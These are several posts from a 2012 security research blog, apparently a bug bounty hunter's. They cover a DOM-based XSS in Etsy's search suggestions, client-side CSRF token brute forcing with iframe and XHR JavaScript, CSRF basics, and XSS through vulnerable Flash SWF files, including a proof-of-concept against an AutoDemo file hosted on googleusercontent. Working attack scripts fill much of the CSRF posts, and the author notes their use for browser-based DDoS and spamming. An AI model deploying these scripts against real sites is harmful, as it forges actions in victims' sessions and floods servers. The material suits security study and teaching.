Friday, 14 December 2012

DOM Based XSS in Etsy

I recently found a DOM based XSS vulnerability in the Registry search function on and thought I'd do a quick write up.

What is DOM based XSS?

DOM based XSS (In this article I'll abreviate to DBX) is slightly different to regular XSS in that we are targeting the underlying Javascript used on the client-side instead of reflecting our attack off some server-side function. The end goal is however the same, typically the execution of malicious Javascript within the trusted domain of the target site.

Usually to find DBX vulnerabilities we need to trace the input and output of client-side Javascript functions and find data flows with poor (or non-existent) input validation. Manual code analysis is possible but it's far quicker and easier to use an automated tool such as Dominator.

Dominator is implemented using a modified version of Firefox and will dynamically test pages as you browse. It specifically looks for sources and sinks, essentially where input data goes in and where it comes out. For data flows that are potentially vulnerable Dominator will give you a warning and a step by step view of how exactly the data is being processed. It's then down to you to pick apart the output to figure out if it can actually be exploited or not.

You can get a free trial of Dominator Pro at the official site here:

Although there are multiple places where DBX vulnerabilities can appear, today I'm going to be looking at the handy little search box suggestion drop-down.

The humble suggestion function...

The search box suggestion menu is a staple function in most modern web sites. You enter some text in a search box and it gives you a set of suggestions back.

Me searching for a new dress on Etsy. (I ended up buying the hot pink dress ;) )

In the background there's a clever piece of Javascript running that detects when the input changes, dynamically processes the input and sends back suggestions. It's a useful function but does it validate my input?

Enter Dominator!

As mentioned before Dominator will break down the Javascript functions on the page and figure out where the sources and sinks are. Any time we can control a potentially sensitive sink Dominator will produce an alert and show us how our data is being processed.

How can we use this information to exploit a search field? Rather conveniently Stefano (the creator of Dominator) produced a handy tutorial here:

With Stefano's suggestions in mind I took a look at and came across the Registry suggestion field here:

This field unsecurely used the search input and was vulnerable to DBX. I forgot to take a picture of the *actual* vulnerable code but here is equivalent code that is used for the main Etsy search function. Check it out:

Dominator tells us how our input data is manipulated as it passes through the javascript in the background. I started off by typing 'abc' in the search box and as you can see a replace function removed carriage returns, the input was made lowercase then concatenated with other strings and added to the page.

What's missing? Input validation! According to this input processing path, not once are special characters removed or replaced.

How can we exploit this?

Ideally we'd like to insert some malicious javascript in the page. How about inserting a sneaky iframe containing javascript?


Simply inserting this code into the search box won't work as the output is still inside various quotation marks and HTML tags. Looking down the screenshot above, the bottom part shows our finished html that will be written to the page. In this code you'll notice two possible injection points, the first is by the span tags, the second is in the list object's data-value.

The first injection point actually had some additional checks but the second injection point didn't. So to exploit we just close off the quote for the data-value, close off the list tag and then insert our iframe.


Entering this query into the search box would successfully lead to exploitation.  

Although I didn't review the code, I believe the main search box isn't vulnerable because of two mitigations. The first is that if your query contains special character such as slashes, quotes or brackets, the search box redirects you to a default text "find shop names containing" which prevents usage of the suggestion function. The second mitigation involves a maximum length on the suggestion. If your input is too long you will no longer be given suggestions.

Final Thoughts

This vulnerability yet again demonstrates the importance of using proper input validation for ALL inputs. Even in 2012 (almost 2013!) developers are still missing the basics it seems.

DBX is an interesting attack vector that's not as well known or researched as regular XSS partly due to the difficulty of dynamically analysing Javascript. Dominator has really filled a gap in the market providing both attackers and defenders with a way to detect potential DBX vulnerabilities. Props to Stefano for making such an awesome tool.

Lastly I want to give a shout out to Etsy for a quick response/fix as well as the bounty!


The PwnDizzler

Tuesday, 4 December 2012

CSRF Token Brute Force Using XHR

In my last post I mentioned I had been working on a client-side XHR based CSRF token brute forcer. In this post I'm going to talk in-depth about the script I've developed, how it performs compared to other techniques and the limitations I encountered.

Previously I covered the basics of CSRF and demo'ed two iframe based brute force scripts. The posts can be found here:

And here:

CSRF token brute forcing: IFRAME vs XHR

Having already introduced client-side CSRF token brute forcing in my previous post I'm going to jump straight into how techniques using iframes and XHR compare with each other.

Fundamentally iframes and xhr are completely different things. Iframes provide a way to embed content in a page. In the previous examples however we used them as a way to send hundreds of arbitrary requests to a third party without leaving the current page. Although iframes can do this, they were never optimised for it.

XMLHttpRequest on the other hand was created as a way to send/receive arbitrary data. The granularity offered by XHR allows greater control of the connection and greater efficiency when it comes to brute forcing.

Doesn't Same Origin Policy prevent Cross-Domain Requests?

I meant to cover this in the previous post but didn't have time. The short answer is no.

Iframes by design are allowed to load cross domain content but browser's prevent cross domain interaction between the page and the iframe. It is still possible to send a request through an iframe (for CSRF), we just can't see the response.

One of the most interesting attacks involving iframes is click-jacking, where we embed a legitimate site within a malicious page we control and trick the user into interacting with the embedded page. Wikipedia:

Most large sites now implement the x-frame-options header to prevent framing of content. If a server responds with the x-frame-options header set to DENY, the browser will not render the content. Lets compare the response headers of Facebook and Amazon:

Facebook homepage, notice the X-Frame-Options header.

Amazon homepage, no X-Frame-Options header!

As you can see below the Amazon main page is open to click jacking.

Anyhow I'm getting a bit off topic, back to XHR! XHR like any other browser request is subject to the usual restrictions, by default cross domain requests are allowed but responses are never rendered. There are some exceptions of course such as scripts, CSS, images and CORS.

But for CSRF though, the important point is that browsers allow you to send cross domain requests. You can't see responses but in a CSRF attack you don't care about responses!

For more information on XHR its worth checking out:

Lets build a brute forcer!

Following on from my previous work I decided to write a XHR-based CSRF token brute forcer to see if I could speed up the brute force process. I had a search around on Google and couldn't find a CSRF token brute force script that used XHR, so I decided to write my own.

1. XHR Code

I started off with some basic XHR code. Shreeraj Shah covers a simple XHR CSRF example here:

var xhr = new XMLHttpRequest();
var url = '';'POST',url, true);
xhr.setRequestHeader('Accept', 'text/javascript, text/html, application/xml, text/xml, */*');
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
var datas = 'name=a&phone=b';

It's pretty self explanatory, we create our XHR connection object, set basic request parameters with open, define extra headers, create the data string we want to send and send it.

Shreeraj's example includes the withCredentials method to ensure our request would use the user's cookie when sent and he also sets the content-type to plain text. The site I was testing against required me to use a content-type of "application/x-www-form-urlencoded" and didn't enforce preflight checks so I changed this parameter.

2. Iteration To Send Multiple Requests

Just like the previous brute forcers I also found setInterval and setTimeout to be the quickest way to send and control XHR. I configured setInterval to repeatedly call a function containing the XHR connection code. SetTimeout stops setInterval after a specified time period and outputs the finished message to the screen.

I used a set of global variables to maintain the current state of the attack, each new request would use the current values and increment them. I did try using a FOR loop to spam requests but I found Chrome throttled the requests to one per second.

var task = setInterval("openXHR();", 1);

setTimeout("clearInterval(task);document.getElementById('done').innerText ='Finished'", 1000); 

I created some funky incrementing code to allow iteration through number or letter arrays and also to allow arbitrary positioning of variables. No doubt this can be cleaned up a bit.

3. Maximizing Throughput: A Balancing Act

I played around quite a bit with different ways to increase the throughput. This was a careful balancing act between the number of connections, the number of requests being sent to the connections and how fast connections could be established and pulled down.

  • Multiple XHR Objects
The first idea I had to increase throughput was using multiple XHR objects. Browsers usually allow 6 concurrent connections to the same site so why not create 6 XHR objects to work in parralel? Multiple connections working in parallel means more requests per second right? Kinda.

I discovered Chrome would use the same connection for sending multiple requests provided you gave it enough time for each request to receive a response. If you start forcing requests down the same connection Chrome opens new connections. So it turns out you don't really need to use multiple objects, with a single XHR object Chrome automatically runs at maximum speed.

Using an interval of 50ms Chrome will use a single connection (src port)

With an interval of 10ms Chrome opens a new connection for each request

(For attacking sites locally multiple XHR objects will give you a speed increase as responses are received a lot quicker. However when you try this with a remote site the latency causes requests to start backing up and this technique no longer works.)

  • Aborting connections after the request
Requests were typically taking 10ms to establish a connection, 1ms to send data and 10ms to wait for the confirmation ACK. To prevent the browser waiting for a response I tried using the abort method. My aim was to close the connection as soon as the request was sent as this would free up one of the browser's concurrent connection slots.

Typical timings for a request (see Time column)

I tested this by performing xhr.send followed by a call to a wait function, then xhr.abort. This technique worked but was not as fast as I had hoped and capped out around 40 requests per second.

Using the abort method we send a FIN after our request is sent

As you can see from the packet capture, the abort method sends a FIN to gracefully close the connection and the connection stays open waiting for a FIN ACK. Compared to our initial run its no faster. Ideally we want to close the connection as quickly as possible so would rather send an RST packet but I couldn't find a way to do this :(

  • Keeping it simple?!?
Often the simplest solution is the best solution so I tried using a single XHR object and just sending requests as fast as possible using setInterval with a 1 millisecond wait. Interestingly this produced the highest throughput per second, around 60 requests per second.

Spamming requests!

The catch with this technique is that its unreliable. You will often lose packets as you are trying to send data when no connection slot is free. Using an interval of just 1 millisecond I sometimes saw losses of up to 75%. The interval can be adjusted according to how reliable you need the attack to be.

4. The Finished Product

Putting everything together here's the final code for the brute forcer:

<div id="a">Sending request: <output id="result"></output></br>
<div>NOTE: Browser requests sent != Actual requests sent (Check wireshark)</div>
<output id="done"></output></div>

//Create XHR objects
var xhr1 = new XMLHttpRequest();
var xhr2 = new XMLHttpRequest();

//Global variables
var url = '';
var numbers = new Array("0","1","2","3","4","5","6","7","8","9");
var alphabet = new Array("a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z");
var i=0;
var j=0;
var k=0;
var l=0;
var m=0;

//Simple wait function
function tea_break(msec) { 
 var date = new Date(); 
 var curDate = null; 
 do { curDate = new Date(); } 
 while(curDate - date < msec); }

//Function to send a request using current parameters
function openXHR(){'POST',url, true);
 xhr1.setRequestHeader('Accept', 'text/javascript, text/html, application/xml, text/xml, */*');
 xhr1.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
 var data1 = 'name=a&phone=b&email=c&csrf=' + numbers[j] + numbers[k] + numbers[l] + numbers[m];
 //***Optional wait and abort
 //Screen output
 document.getElementById('result').innerText = "" + j + k + l + m;
 //***Optional second XHR object
 //'POST',url, true);
 //xhr2.setRequestHeader('Accept', 'text/javascript, text/html, application/xml, text/xml, */*');
 //xhr2.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
 //var data2 = 'name=a&phone=b&email=c&csrf=' + numbers[j] + numbers[k] + numbers[l] + numbers[m];

 //Will need to change limits/logic for alphabet set
 } else{
 //Tick over to 0 at end of set
 if(m==0 && l==9){
 } else if(m==0){
 if(m==0 && l==0 && k==9){
 } else if(m==0 && l==0){
 if(m==0 && l==0 && k==0 && j==9){
 } else if(m==0 && l==0 && k==0){

//Speed at which requests are sent
var task = setInterval("openXHR();", 1);
//Stop sending after x milliseconds
setTimeout("clearInterval(task);document.getElementById('done').innerText ='Finished'", 1000); 



Show me some benchmarks!

For this set of testing I relied on Wireshark to get a definitive answer of what packets were actually being sent. Chrome (and likely other browsers) show requests taking place in the developer tools but in reality only a limited number actually complete successfully.

Wired vs wireless had a big impact so I performed all tests plugged in via ethernet. Responses were typically 10ms for wired and 30ms for wireless.

I've also included revised results from my previous tests using IFrames. Results show the maximum number of requests per second.

Chrome22 IE9 FF16

Multi-IFrame Local 29 25 14

Remote 7 8 7

Single IFrame Local 60 79 10

Remote 50 1 10

XHR Local 110 Error 70

Remote 55 Error 65


Python Remote 300

BlackMamba Remote 3000?

The good news is that the XHR method is faster than the other techniques especially for local attacks. The bad news is that XHR is only marginally faster and is still too slow to crack most CSRF tokens in use today.

The same limitations I discussed in the previous post still apply, with latency and concurrent connection limits having the biggest impact on throughput. Traditional CSRF prevention techniques such as complex tokens or Referrer/Origin checking also prevent this type of CSRF attack.

I've included some numbers for a direct brute force attack using python. At BlackHat this year Dan Kaminsky mentioned BlackMamba which is a concurrent networking library for Python. Using this library he was able to scan 3000 addresses per second. Sweet!

Final Thoughts

So we have a brute forcer, what now? Find a page with a weak token, build a malicious page, trick users into visiting your page and enjoy the CSRF, right? ;)

After working on the iframe based brute forcers and the XHR version I feel a little disappointed I couldn't push the requests per second into the hundreds or thousands. For most sites token entropy isn't that bad and realistically you'd need to send 1,000 to 100,000 minimum requests per second for an attack to succeed given the short time frame offered by a drive-by style attack. Unfortunately it's just not feasible to send that many requests with current technology.

Whilst the main focus of my work has been brute force CSRF, the scripts I've been demonstrating essentially provide a client-side mechanism for sending thousands of post requests. Such a mechanism could be used for all kinds of mischief, browser based DDOS and mass spamming spring to mind.

Probably the best thing about these attacks is that all requests would come from unsuspecting users who just happen to run your javascript. The only evidence of the true origin of the attack would be the referrer header of requests and if the malicious javascript was hosted on a legitimate site there would be no way to trace the true origin at all.

I hope you guys have found this interesting, any comments, questions or corrections just leave a message below. Also if anyone can suggest any alternatives to iframes or XHR please let me know! :)


Pwndizzle out

Saturday, 24 November 2012

Client-side CSRF Token Brute Forcing

While playing around with some CSRF examples the idea of client-side CSRF token brute forcing came into my head. I'd never heard of this type of attack before and did some Googling. I was interested to see that although the attack was known about there was very little in terms of proof of concept code or in-depth research. I decided to dig further into this area and play with a few examples.

Note: This is the second part of a journey into CSRF. To learn more about the basics of CSRF please check out my previous post here:

Create a page containing malicious javascript, when someone visits the page the javascript runs forcing the user to send requests to brute force their own CSRF token on a remote site. Win!

Stuff you'll need

To actually play with the examples below you'll need:
  • A web server running on your machine - Apache on Linux or Xampp (which contains Apache) on Windows.
  • Code editor. I use Notepad++ but there's also the classics vim, gedit, emacs :)
  • Debugging tools. Browser developer tools - Chrome (right click inspect element), IE (press F12) and Firefox (Firebug or HttpFox). Or you could use Burp or Zap (although they can slow things down). Also Wireshark is handy for more low level investigation.
  • A CSRF example to actually attack. I used Debasish Mandal's simple CSRF example here:

What is client-side CSRF token brute forcing?

CSRF prevention often involves the use of a unique token to prevent the attacker from crafting a valid request ahead of time. While the attacker may not be able to directly access this token, they may be able to just guess or brute force the token instead.

Client-side CSRF brute forcing uses the same concept as traditional token brute forcing i.e. iterating through possible token values until we find a valid token, but combined with CSRF. So instead of sending requests from our attacking machine to the remote server with our cookie, we get the target user to send multiple requests to the remote server with their cookie. Eventually they will guess the correct token and the malicious request will be accepted by the server.

In a typical brute force attack we'd want to send requests and monitor the responses for an indicator that the attack succeeded. However in a CSRF brute force attack we never receive or even want to receive responses. A subtle point but worth bearing in mind as it can speed up the brute forcing process.

Also note that for this attack to succeed the remote site must be using a weak CSRF token (otherwise it will take too long to brute force) and the target user must be able to run javascript.

Surely someone's done this before?

I checked Google for previous research but couldn't find much. There were lots of articles about the CSS history hack that was around a few years ago (Nice attack but sadly it doesn't work in modern browsers). Also there was a talk from BlackHat 2009 where the guys obtained access to CSRF tokens by taking advantage of information leakage:

Again, cool attack, but not what I was looking for. After some more digging I came across two decent posts, one written by Debasish Mandal on his awesome blog and another by Tyler Borland:

Both guys present proof of concept CSRF brute forcers that use iframes to send multiple CSRF post requests with different tokens. Although great scripts neither was optimised for speed or handling thousands of requests. I used both scripts as a starting point for building my brute forcers and modified them to increase their functionality, simplify the code and speed them up.

When running these scripts the developer tools might show errors like "request aborted" or "canceled", these can often be ignored as the requests are actually still being sent. Burp or Wireshark can be used to verify what is actually being sent/received.

Bring on the Javascript!
Example #1

Debasish's script focused on creating a set of iframes that each contained a post request, each iframe would tackle a different CSRF token. Debasish used two files one for the generation script and one for the post form, this increased the volume of code but also the execution time. I combined the two together. 

<div id="a">Launching brute csrf...</div>

//Character sets to use
var numbers = new Array("0","1","2","3","4","5","6","7","8","9");

//Iterate through list
//May need extra for loops for additional character sets
for (var j = 0 ;j<=9;j++)
 for (var i = 0 ;i<=9;i++)
 //Create frame
 frame = document.createElement('iframe');

 //Add post form and javascript to frame
 //Add/remove character sets and positions where appropriate
 frame.contentWindow.document.write('\<script\>function fireform(){document.getElementById("csrf").submit();}\</script\>\<body onload="fireform()"\>\<form id="csrf" method="post" action=""\>\<input name="name" value="bill"\>\<input name="phone" value="123456"\>\<input name="email" value=""\>\<input name="csrf" value="' + numbers[j] + numbers[i] + '"\>\<input type="submit"\>\</body\>');

My version is a bit faster and more compact making it easier to test/modify. The biggest issue with this script is that it doesn't scale as each request has it's own iframe. When brute forcing we're going to need to send potentially thousands of requests and creating, adding and loading thousands of iframes just isn't practical.

Using setInterval() it would be possible to process iframes in batches but overall this technique is just not as efficient as Tyler's technique below.

Example #2

Tyler Borland's script was originally designed for denial of service through account lock-outs but I've modified it for brute force. The concept is quite simple, there's a post form that contains a token value, this value is repeatedly incremented and submitted to an iframe. Usually when you post data with a form the page will navigate to the response from the server. By sending our post request to the iframe the iframe will load the response and the user remains on our malicious page allowing the attack to continue! The important variable here is "target" this redirects our post request to the iframe.

Tyler originally used the iframe onload function to automatically send the next request once the current request had completed. Whilst this is a clean and effective technique it's not the fastest. For some reason I was getting a 500ms delay before any response packet was received. I couldn't find the cause of the delay but by removing the onload and implementing a threaded approach with setInterval I was able to send requests at a faster rate. I also added some simple brute force logic, character sets and basic output.

<!DOCTYPE html>

<!--Info on progress so far-->
<div id="a">Sending request: <output id="result"></output>

<!--Form that will be submitted-->
<form id="myform" action="/ww/submit.php" target="my-iframe" method="post">
  <input name="name" type="hidden" value="hacked">
  <input name="phone" type="hidden" value="hacked">
  <input name="email" type="hidden" value="hacked">
  <input id="tok" name="csrf" type="hidden" value="">
  <input type="submit"> 

<script type="text/javascript">

var alphabetlower = new Array("A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z");
var alphabetupper = new Array("a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z");
var alphabetcombo = new Array("A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z","a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z");
var numbers = new Array("0","1","2","3","4","5","6","7","8","9");
var allcombo = new Array("A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z","a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","0","1","2","3","4","5","6","7","8","9");

var i=0;
var j=0;
var k=0;
var l=0;
var m=0;

//OPTION #1 - Without onload
//Function to submit the form once, this is repeatedly called
function submit1(){
 //Assign token value. Can switch numbers array for alphabet array depending on token.
    document.getElementById('tok').value= "" + numbers[k] + numbers[l] + numbers[m];
    //Submit form
 //Show token on page
 document.getElementById('result').innerText = "" + i + j + k + l + m;
 //Increment token, reset to 0 when we reach 9 e.g. 009 to 000, L is incremented later
 //For alphabet array 9 needs to be switched for 25
 } else{
 //Tick over at end of set 9 to 0.
 if(m==0 && l==9){
 } else if(m==0){
 //Tick over at end of set 9 to 0. 
 if(m==0 && l==0 && k==9){
 } else if(m==0 && l==0){

//Submit form every <x> milliseconds
var task = setInterval("submit1()",10);
//After <x> milliseconds has passed stop submitting form
setTimeout("clearInterval(task);alert('Requests sent: ' + k + l + m);", 10000);

//OPTION #2 - Using onload
//If you want to use iframe with onload, comment out above two lines and uncomment below:
function submit2(){
 } else{
 var t2=new Date();
 alert('Finished in ' + (t2-t1)/1000 + ' seconds');


<!--OPTION #1 - no onload-->
<iframe id="my-iframe" name="my-iframe"></iframe>
<!--OPTION #2 - using onload-->
<!--<iframe id="my-iframe" name="my-iframe" src="/ww/submit.php" onload="submit2()"></iframe>-->
<!--In Chrome if x-frame-options is set to Deny, the page won't load and onload won't trigger!-->


The brute force logic relies on setInterval, setTimeout and global variables as I couldn't get FOR loops to work. I believe this relates to the way the DOM loads content. You essentially need to execute javascript, allow the page to load, then run some more javascript, allow page to load and repeat. I'll stop now as real life web developers are probably cringing at this point, haha, hey I'm no javascript expert!

When testing this code the important parameters are the rate at which requests are sent, controlled by setInterval, and the total run time, which is controlled by setTimeout. Times are in milliseconds so for example 1000 milliseconds = 1 second. Also you will need to change the form's "action" parameter to the page you want to attack.

Example #3 (the mystery prize!)

I've also been working on my own brute force script that uses XHR which I'm going to talk about in a subsequent post, so stay tuned!

What's the performance like?

I tested my modified scripts against Desish's vulnerable page and also a remote site on the net. For each run I calculated the maximum number of requests it was possible to send per second. The results are meant only as a rough guide, as the brute force speed is heavily dependent on the exact code used and a number of external factors.

Edit: Some of these numbers may be a little off as I discovered Chrome/IE were lying to me :) To get accurate numbers I'd recommend checking what packets are actually being sent with Wireshark.

Chrome22 IE9 FF16

Debasish Local 29 25 14

Remote 7 8 7

Tyler Local 60 79 10

Remote 30 30 1

Debasish vs Tyler

The first thing you'll notice is that Tyler's script is a lot faster. Debasish's script spends too much time creating and adding all of the iframes to the DOM and then suddenly tries to load them all creating a bottleneck. Tyler's script however sequentially executes requests one by one making it more CPU/memory/network efficient.

Local vs Remote

The second thing you'll probably notice is that remote requests are a lot slower than local requests.While this is to be expected it's important to emphasize just how much of an issue this is for brute forcing. Forget about fancy protections, latency is the single biggest issue when it comes to online brute force attacks. In most cases it will simply take too long to establish connections for the hundred/thousand/millions requests needed, making brute force unfeasible. Also much like latency, the cap on concurrent connections severely limited throughput. All browsers implement a cap and there is no way around it.

For example when trying to brute force a relatively small five character token consisting of lowercase and uppercase letters and numbers the search space will consist of 62^5 = 916 million possible combinations. Performing 10 requests a second it will take nearly three years to try every combination, uh oh!

Chrome vs IE vs Firefox

The last thing I'll mention is browser differences. Firefox seemed to use some kind of throttling (not sure if this was intentional or just a technical limitation) to prevent the browser from rapidly sending requests. Often requests would be dropped with no explanation.

Chrome and IE both performed really well. I found this surprising as I assumed Chrome would whoop IE but it looks like Microsoft have done a good job with IE9. Averaging 1 request every 17ms ain't easy! For more information on the differences between browsers it's worth checking out:

Hey! What about scaling?

I only did a few quick tests with Tyler's script but it seemed to scale pretty well. As mentioned already Debasish's script will need a re-write to scale properly. Also be aware that when sending a large number of requests you will blow up the developer tools, so disable them!

Are there any limitations?

Yes, quite a few.

Client-side limitations
  • Browser has a max number of concurrent connections
  • User must allow Javascript execution
  • Browser's built in CSRF protections
  • Processing speed of browser
  • Memory of browser

Server-side limitations
  • Latency between browser and web server
  • CSRF protection mechanisms e.g. Referrer/Origin checking
  • Server processing speed
  • Application layer or network layer lock-outs
  • Max number of concurrent connections for your ip
  • ISP may block large number of requests

Quite an ominous looking list. But interestingly the scripts I've covered in this post will still work on weak tokens for sites that do not implement lock-outs or origin checking.

Possible improvements and the future?

I know I said latency was the biggest issue but I think if you take a step back you realise its current CSRF techniques that are the real issue, fundamentally you are limited to the browser and to using javascript.

With that said there is more work that I think can be done with client-side CSRF brute forcing. I had only a limited amount of time to research, develop and test everything and I'm not even a web developer! :) I'd be really interested to see what other folks could do if they carried on developing this code.

Threading was not something I really discussed in this post but the setInterval method and web workers offer a lot of possibilities. Also low level efficiency is really important, opening and closing connections is really inefficient as is waiting for replies. If you could open one connection, pipe data over it and not wait for responses you've got yourself a great candidate for a brute forcer.

Using perl/python/c/java/ruby script you have a lot more flexibility. Unfortunately for CSRF to suceed the request must be performed client side which means that usually others languages can't be used. Or can they? :)

As usual I want to finish this post by saying I'm no expert with CSRF or browser internals so I have likely missed the obvious or done things completely back to front! I enjoy playing around with code and for me its a great learning experience that I want to share with others. If anyone has any ideas, corrections or comments feel free to drop me a comment below.



Thursday, 15 November 2012

Back to Basics: CSRF

I've recently been playing with client-side CSRF token brute forcing. It's cool stuff but for folks who aren't so hot on CSRF (or just need a refresher!) I thought I'd do a quick CSRF back to basics. As CSRF has been talked about a lot before I'm going to try and keep it brief covering some simple attacks and mitigations.

For a basic introduction the best place to start is OWASP:

In a nut shell, we are tricking a user into sending our malicious request to a remote server, using their already established session. This is usually possible because the structure and contents of a vulnerable request is known ahead of time and it's just a matter of creating the request and convincing a user to send it. Awesome, so we can perform actions as another user? Yep!

How do you actually launch a CSRF attack?

If the target site has a vulnerable page that is accessed using a GET request, all we need to do is create a webpage or email containing either a malicious link or image and trick the user into accessing it. The user will run the code and unknowingly send a malicious request to a third party site. From OWASP:

<a href="">View my Pictures!</a>


<img src="" width="1" height="1" border="0">

For a vulnerable page that uses a POST request we can create a webpage with a form and some javascript to auto-submit it. When the user visits the page it will submit the request using their session cookie. The form "action" should link to the target site and the parameters should be identical to a legitimate request. 

    <form action="" method="post" name="badform">
        <input name="accountId" type="hidden" value="1234" />
        <input name="amount" type="hidden" value="1000" />
<script type="text/javascript">

The above examples can also be created using jquery or pure XHR, for example:

function xhrcsrf(){
var http = new XMLHttpRequest();, "" , true);
http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http.withCredentials = "true";
http.onreadystatechange = function() {
 if(http.readyState == 4 && http.status == 200) {

To test these examples you probably want to install xampp on Windows or apache on Linux. And for a vulnerable page I used Debasish's simple profile.php and submit.php script here:

How to protect against CSRF?

CSRF relies on the static nature of requests and the ability to send cross domain requests. By making requests unique and checking where they originate from you can easily prevent CSRF.

To make requests unique commonly a random value, or token, is included as a parameter. An attacker will not know this value ahead of time and will be unable to craft a static malicious page that can send a valid request.

For example a unique token could be generated server-side using the current time, a secret key value and a complex math function. This value is returned when the user loads a page on a site and is submitted with all requests back to the server. Assuming everything else is secure, there is no way for the attacker to know this token without knowing the underlying token generation algorithm.

Below is a status update to Facebook. I've circled the token they use to prevent CSRF.

The other protection mechanism I mentioned was sender verification. To verify the source of the request the receiving page can inspect the Referrer or Origin header of the request. A simple check would verify that the request came from your legitimate domain and not from another site (cross-domain). 

There's a great article about CSRF protections that is far more in-depth here:

How to get around CSRF protections?

This is where things get a bit tricky. If a site is checking the Origin or Referrer header of your requests you're stuck. Browsers set these headers and unless you can modify the traffic leaving the browser (malicious extension?) or on the wire (mitm), then there is no way to tackle this.

EDIT: I was actually wrong about this. Kotowicz has some work arounds here:

Chrome added these headers.

One exception is if you can include your code somewhere on the target site, e.g. XSS, which can be leveraged for CSRF.

So what about tokens? If implemented correctly they work perfectly well and will prevent CSRF attacks. However, quite often tokens are not implemented correctly allowing us to bypass the token check or possibly brute force the token. For example:

One missed token check and you have a serious CSRF vulnerable (as well as a $5000 payout :D).

Can you brute force the token?

It depends on the entropy (complexity) of the token. You need to analyse it's length, character set, does it repeat, are there any static characters, are there relationships between characters, all of these factors determine it's entropy (Burp Sequencer can help with analysis). If a token has a high level of entropy there will be too many possible combinations and it will take too long to brute force. You also need to think about other more practical issues such as latency, which could make the attack unfeasible, or server-side lock outs. Five failed attempts and you get locked out? Brute force ain't gonna work but denial of service will :)

One of the best tools for brute forcing tokens is Burp Suite Repeater as it allows you to send a large number of requests iterating through token values until you find the correct one. Its quick and easy but requires you to have a valid cookie.

What if you don't have the target user's cookie? That's where client-side brute forcing comes in! :)


In my next post I'm going to continue with the CSRF theme and look at some interesting client-side CSRF token brute forcing examples.

Feedback and comments are always appreciated, feel free to leave a message below.



Saturday, 27 October 2012

XSS using a Flash SWF + Google XSS

Recently I've been brushing up on my XSS. One interesting example I came across used Flash SWF files to perform XSS:

This type of attack has been around for years, I'd never played with it myself so decided to look into it further. First up, what is an SWF? From Wikipedia:

SWF is an Adobe Flash file format used for multimedia, vector graphics and ActionScript. SWF files can contain animations or applets of varying degrees of interactivity and function.

If these files can contain ActionScript, then that means there's going to be input/output and potential vulnerabilities! And for media/graphics teams and companies whose focus is producing content security is really not going to be a priority. Good news for us but bad news for anyone hosting SWFs.

For an introduction to exploiting SWFs check out the OWASP site:

The cool thing with these files is they can be decompiled with relative ease allowing you to perform static analysis. By locating the input variables and the functions that use these variables you can sometimes spot potential vulnerabilities.

So first up you need a decompiler, I found ASdec to be quick and effective, SWFScan is also a good choice especially because it has a built in vulnerability scanner which can speed things up.



Next find yourself an SWF. The easiest way is to Google "filetype:swf", open any link and in Chrome go to Options -> Save Page As. Now you can open the SWF in ASdec, SWFscan, or both, I found ASdec easier to follow, but as already mentioned the vulnerability scanning feature of SWFscan is pretty handy. So to start off I'd run a quick scan in SWFscan (the Analyze button). If you get lucky you might find a potential XSS/CSRF. Take a look at the "Source" tab, this should have the vulnerable code highlighted.

There are two things you should try to look for, the first is input variables or undeclared global variables, these are denoted by _global, _root or _level0. These are variables we may be able to control and potentially use to exploit the SWF. The second thing to look for are interesting functions that use these variables. The OWASP site has a good list of functions to look out for:

XML.load ( 'url' )
LoadVars.load ( 'url' ) 
Sound.loadSound( 'url' , isStreaming ); 'url' );

Next you'll need to verify how the variable is being used and if it's actually possible to take control of the function. Sometimes you won't be able to control the input value or there may be filtering in place. This is where static code analysis comes in. As each SWF is different there is no fixed method for this but I'll cover some examples below.

Example 1 - XML function with filtering (see code below)

In this first example you can see how the program accepts an XML path as input and performs some checking to prevent us from using a remote resource (such as our own malicious xml file!). The legitimate URL was something like We want to change it to, however in this example it's not possible due to input validation.

The first thing to take note of is the call to our input data (path=_root.xmlPath) and it's subsequent use by the XML object (myXML.load(path)). At first glance this looks quite promising. However you'll notice that before myXML.load is performed our path variable is checked using the isDomainEnabled function...

The isDomainEnabled function first checks for the existence of www or http:// (indexOf returns -1 if something doesn't exist). Then checks if our domain is included in the domain list. I've blacked it out to protect the companies identity but the black spots are just, etc. So if we try to call our remote domain we end up stuck in the while loop uh oh!

So how can we get around this filter? Encoding is an obvious choice or how about using just https:// instead of http:// ? :)

Example 2 - Regex filtering

Another example I encountered took in a parameter called swf_id which was later used in an ExternalInterface call. Unfortunately it was not possible to take advantage of because of regex filtering. First the parameter was loaded. For example if our URL is the swf_id parameter was assigned using root.loaderInfo.parameters.swf_id, in this case if nothing is supplied it was left blank. In this example a RegExp object was used to look for any non-alphanumeric character, if one is found it throws an error. This prevents us from including a URL or Javascript in the swf_id parameter :(  

Example 3 - ExternalInterface Call

There's a good example of how unfiltered inputs can be abused using at the below link:

This example is exploitable because of non-existent input validation of parameters sent to this function:, this.elementID, event);

Does anyone actually use vulnerable SWFs?

After doing all this analysis I thought I'd take a look at a few sites to see if they were hosting any vulnerable SWFs as this could lead to XSS/CSRF.

Google was hosting hardly any SWFs so I checked each one in turn. When running one file in particular it had a user interface that listed AutoDemo as it's creator. Googling AutoDemo and XSS I discovered that there was a file called control.swf that is used by AutoDemo files and its vulnerable to XSS. It hadn't shown up in the original search results but it was there and it was exploitable :)

There is one caveat to this story though. The file was not hosted on one of the core Google domains, it's actually hosted on the sand-boxed cache, "googleusercontent". So sadly it wasn't possible to steal any data using XSS. However it would be possible to use this for phishing and as it is based in the Google family it should still be effective at enticing users to click it.

This was the first file I found:

Here's the proof of concept XSS involving the control file."L0LZ G00GLE H4Z XSS!")//

